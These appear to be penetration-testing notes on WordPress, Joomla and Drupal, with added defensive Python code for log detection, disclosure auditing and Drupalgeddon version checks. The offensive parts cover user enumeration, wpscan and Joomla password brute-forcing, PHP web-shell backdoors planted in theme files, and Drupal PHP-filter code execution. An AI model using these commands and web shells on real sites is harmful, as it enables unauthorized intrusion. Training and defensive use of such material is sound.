CMS attacks
Common application attacks
This page covers attacks on these applications:
WordPress
Joomla
Drupal
WordPress
Grabbing information from the site

$ curl -s http://blog.inlanefreight.local | grep WordPress   # WP version
$ curl -s http://blog.inlanefreight.local/ | grep themes     # active theme
$ curl -s http://blog.inlanefreight.local/ | grep plugins    # installed plugins

WordPress /robots.txt

User-agent: *
Disallow: /wp-admin/
Allow: /wp-admin/admin-ajax.php
Disallow: /wp-content/uploads/wpforms/
Sitemap: https://<site>/wp-sitemap.xml

Key WordPress files
index.php
license.txt
wp-activate.php
wp-admin/login.php
wp-admin/wp-login.php
/login.php
/wp-login.php
xmlrpc.php
wp-config.php

Key WordPress folders
/uploads
/wp-content
/wp-includes

Enumerating Users
$ curl -s -I -X GET http://SERVER:PORT/?author=100
$ curl http://SERVER:PORT/wp-json/wp/v2/users | jq
[
  {
    "id": 1,
    "name": "admin",
    "url": "",
    "description": "",
    "link": "http://SERVER:PORT/index.php/author/admin/",
    <SNIP>
  },
  {
    "id": 2,
    "name": "ch4p",
    "url": "",
    "description": "",
    "link": "http://SERVER:PORT/index.php/author/ch4p/",
    <SNIP>
  },
  <SNIP>

Attacking accounts
Brute force using xmlrpc.php and wpscan

$ wpscan --password-attack xmlrpc -t 20 -U admin -P passwords.txt --url http://SERVER:PORT
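The enumeration and wpscan commands above leave a distinctive trail in the web server's access log. The following is an added example, not part of these notes: a small detector that reads Combined Log Format lines (the sample lines, addresses and thresholds below are constructed and assumed) and reports the ?author= sweep, the REST users listing read and the xmlrpc.php POST burst from one source.

```python
"""Spot WordPress user enumeration and xmlrpc.php password attacks in access logs.

Added example for these notes; the log lines are constructed, not captured."""
import re
from collections import defaultdict

# Combined Log Format prefix: ip ident user [timestamp] "METHOD path PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
AUTHOR_ENUM = re.compile(r"^/\?author=\d+$")      # GET /?author=N probing
REST_USERS = "/wp-json/wp/v2/users"                # public users listing

# Constructed sample: one source sweeps author IDs, reads the REST users list,
# then hammers xmlrpc.php; a second source makes two ordinary requests.
SAMPLE_LOG = [
    f'203.0.113.7 - - [10/Oct/2023:13:55:{36 + i // 2:02d} +0000] "GET /?author={i + 1} HTTP/1.1" 301 0'
    for i in range(5)
] + [
    '203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "GET /wp-json/wp/v2/users HTTP/1.1" 200 812',
] + [
    f'203.0.113.7 - - [10/Oct/2023:13:56:{i:02d} +0000] "POST /xmlrpc.php HTTP/1.1" 200 411'
    for i in range(12)
] + [
    '198.51.100.4 - - [10/Oct/2023:13:57:12 +0000] "GET /?author=1 HTTP/1.1" 301 0',
    '198.51.100.4 - - [10/Oct/2023:13:57:15 +0000] "GET /index.php/author/admin/ HTTP/1.1" 200 5120',
]


def parse_line(line):
    """Return the fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def analyse(lines, author_threshold=3, xmlrpc_threshold=10):
    """Return {ip: [finding, ...]} for sources matching the three patterns.

    author_threshold: distinct ?author= ids from one source before it counts as a sweep
    xmlrpc_threshold: POSTs to xmlrpc.php from one source before it counts as a burst
    """
    author_ids = defaultdict(set)
    rest_hits = defaultdict(int)
    xmlrpc_posts = defaultdict(int)
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        ip, path = ev["ip"], ev["path"]
        if AUTHOR_ENUM.match(path):
            author_ids[ip].add(int(path.rsplit("=", 1)[1]))
        elif path.split("?", 1)[0] == REST_USERS:
            rest_hits[ip] += 1
        elif path == "/xmlrpc.php" and ev["method"] == "POST":
            xmlrpc_posts[ip] += 1

    findings = defaultdict(list)
    for ip, ids in author_ids.items():
        if len(ids) >= author_threshold:
            findings[ip].append(f"author-id sweep: {len(ids)} ids ({min(ids)}..{max(ids)})")
    for ip, n in rest_hits.items():
        findings[ip].append(f"REST users endpoint read {n}x")
    for ip, n in xmlrpc_posts.items():
        if n >= xmlrpc_threshold:
            findings[ip].append(f"xmlrpc.php POST burst: {n} requests")
    return dict(findings)


if __name__ == "__main__":
    for ip, items in analyse(SAMPLE_LOG).items():
        print(ip)
        for item in items:
            print("  -", item)
```

The counts are per source over the whole input; a production version buckets them by time window. The same three patterns map directly onto mitigations: rate-limit or drop the ?author= redirect, restrict /wp-json/wp/v2/users to authenticated users, and disable xmlrpc.php when nothing legitimately uses it.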
Backdoors in WordPress Admin

After logging in as admin, we can add a backdoor to the active theme by placing this line in its 404.php:

system($_GET[0]);

Joomla
Joomla robots.txt

# If the Joomla site is installed within a folder
# eg www.example.com/joomla/ then the robots.txt file
# MUST be moved to the site root
# eg www.example.com/robots.txt
# AND the joomla folder name MUST be prefixed to all of the
# paths.
# eg the Disallow rule for the /administrator/ folder MUST
# be changed to read
# Disallow: /joomla/administrator/
#
# For more information about the robots.txt standard, see:
# https://www.robotstxt.org/orig.html
User-agent: *
Disallow: /administrator/
Disallow: /bin/
Disallow: /cache/
Disallow: /cli/
Disallow: /components/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /layouts/
Disallow: /libraries/
Disallow: /logs/
Disallow: /modules/
Disallow: /plugins/
Disallow: /tmp/

Getting Joomla version

$ curl -s http://target/administrator/manifests/files/joomla.xml | xmllint --format -
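The curl | grep commands in the WordPress section and the joomla.xml manifest above both rely on version strings the CMS publishes to anonymous visitors. As an added example, not part of these notes, the script below pulls those disclosures out of a constructed WordPress front page (generator meta tag, theme and plugin asset paths) and a constructed Joomla manifest, so a site owner can see what a visitor learns before deciding what to suppress. Host names, slugs and versions in the samples are assumptions.

```python
"""Audit what a CMS front end discloses: WordPress version/theme/plugins from its HTML,
Joomla core version from the manifest the curl command above fetches.

Added example for these notes; both samples are constructed, not captured from a real site."""
import re
import xml.etree.ElementTree as ET

# Constructed WordPress front page fragment (generator tag plus theme and plugin assets).
WP_HTML = """\
<html><head>
<meta name="generator" content="WordPress 6.2.2" />
<link rel="stylesheet" href="https://blog.example.test/wp-content/themes/twentytwentythree/style.css?ver=6.2.2" />
<script src="https://blog.example.test/wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.7.7"></script>
<script src="https://blog.example.test/wp-content/plugins/wpforms-lite/assets/js/wpforms.min.js?ver=1.8.2"></script>
<script src="https://blog.example.test/wp-content/plugins/contact-form-7/includes/js/swv/index.js?ver=5.7.7"></script>
</head><body></body></html>
"""

# Constructed administrator/manifests/files/joomla.xml (shape follows a Joomla 4 manifest).
JOOMLA_MANIFEST = """\
<?xml version="1.0" encoding="UTF-8"?>
<extension type="file" method="upgrade">
  <name>files_joomla</name>
  <author>Joomla! Project</author>
  <version>4.3.1</version>
  <description>FILES_JOOMLA_XML_DESCRIPTION</description>
</extension>
"""

GENERATOR_RE = re.compile(r'<meta\s+name="generator"\s+content="WordPress\s+([\d.]+)"', re.I)
THEME_RE = re.compile(r"/wp-content/themes/([^/\"'?]+)/")
# plugin slug followed, somewhere in the same asset URL, by its ?ver= parameter
PLUGIN_RE = re.compile(r"/wp-content/plugins/([^/\"'?]+)/[^\"']*?\?ver=([\d.]+)")


def wordpress_disclosures(html):
    """Version from the generator meta tag, theme slugs, and plugin slug -> 'ver' value.

    The ver parameter is whatever the plugin registered for its asset; it is usually the
    plugin's own version but can be the WordPress version or a cache-buster instead."""
    m = GENERATOR_RE.search(html)
    plugins = {}
    for slug, ver in PLUGIN_RE.findall(html):
        plugins.setdefault(slug, ver)          # keep the first ver seen per plugin
    return {
        "version": m.group(1) if m else None,
        "themes": sorted(set(THEME_RE.findall(html))),
        "plugins": plugins,
    }


def joomla_version(manifest_xml):
    """Text of the <version> element in joomla.xml, or None if absent."""
    root = ET.fromstring(manifest_xml.encode("utf-8"))
    node = root.find("version")
    return node.text.strip() if node is not None and node.text else None


if __name__ == "__main__":
    print(wordpress_disclosures(WP_HTML))
    print("Joomla core:", joomla_version(JOOMLA_MANIFEST))
```

Removing the generator tag (remove_action('wp_head', 'wp_generator') in the theme's functions.php) only hides the first field; the ?ver= parameters on enqueued assets still carry version numbers, so the theme and plugin inventory remains readable. For Joomla the manifest lives under /administrator/, so restricting that path at the web server also closes the anonymous version lookup.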
Enumerating with droopescan

$ droopescan scan joomla --url http://target/

Brute forcing with joomla-bruteforce

https://github.com/ajnik/joomla-bruteforce

$ sudo python3 joomla-brute.py -u http://target -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr admin
Backdoors as Joomla Admin

After logging in as admin, we can add a backdoor to the active template by placing this line in its error.php:

system($_GET[0]);

Drupal

Enumerating with droopescan

$ droopescan scan drupal --url http://target/

RCE
Enable the PHP Filter module and create a new Basic Page whose body contains a PHP webshell. Make sure the Text format is set to PHP code:

<?php
system($_GET['3232ewql']);
?>

In older Drupal versions the PHP Filter module is installed by default. In newer versions it has to be installed manually, either through the admin page or by uploading it via FTP.
Drupalgeddons

CVE-2014-3704, known as Drupalgeddon, affects versions 7.0 up to 7.31 and was fixed in version 7.32. It is a pre-authentication (unauthenticated) SQL injection flaw that could be used to upload a malicious form or create a new admin user.

CVE-2018-7600, also known as Drupalgeddon2, is a remote code execution vulnerability affecting Drupal versions prior to 7.58 and 8.5.1. It is caused by insufficient input sanitization during user registration, allowing system-level commands to be injected.

CVE-2018-7602, also known as Drupalgeddon3, is a remote code execution vulnerability affecting multiple versions of Drupal 7.x and 8.x, caused by improper validation in the Form API.
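As an added example, not part of these notes, the function below turns the version ranges stated above into a triage check: given a Drupal core version string it returns which of the two bounded advisories still apply. CVE-2018-7602 is left out because the text gives no version bound for it; the dotted-integer version format is an assumption.

```python
"""Check a Drupal core version string against the Drupalgeddon ranges given above.

Added example for these notes.  Bounds come from the text: CVE-2014-3704 affects 7.0 to
7.31 (fixed in 7.32); CVE-2018-7600 affects releases before 7.58 and before 8.5.1.
CVE-2018-7602 is not checked because the text gives no version bound for it."""


def parse_version(version):
    """'7.31' -> (7, 31); '8.5.1' -> (8, 5, 1).  Raises ValueError on malformed input."""
    parts = tuple(int(p) for p in version.strip().split("."))
    if len(parts) < 2:
        raise ValueError(f"expected major.minor[.patch], got {version!r}")
    return parts


def drupalgeddon_exposure(version):
    """Return the CVE ids from the advisories above that still apply to this core version.

    Tuple comparison does the ordering: (8, 5) < (8, 5, 1) and (7, 31) < (7, 32)."""
    v = parse_version(version)
    major = v[0]
    exposed = []
    if major == 7 and v < (7, 32):
        exposed.append("CVE-2014-3704")   # Drupalgeddon, SQLi, 7.0-7.31
    if (major == 7 and v < (7, 58)) or (major == 8 and v < (8, 5, 1)):
        exposed.append("CVE-2018-7600")   # Drupalgeddon2, RCE, < 7.58 / < 8.5.1
    return exposed


if __name__ == "__main__":
    for ver in ("7.31", "7.32", "7.58", "8.5.0", "8.5.1", "9.5.0"):
        print(ver, drupalgeddon_exposure(ver) or ["not in these ranges"])
```

The two fixed releases quoted in the text make this deliberately coarse: Drupal also shipped Drupalgeddon2 fixes for the older 8.3 and 8.4 branches (8.3.9 and 8.4.6), which this function would still flag, so treat it as a quick first pass against the stated ranges rather than a patch-status oracle.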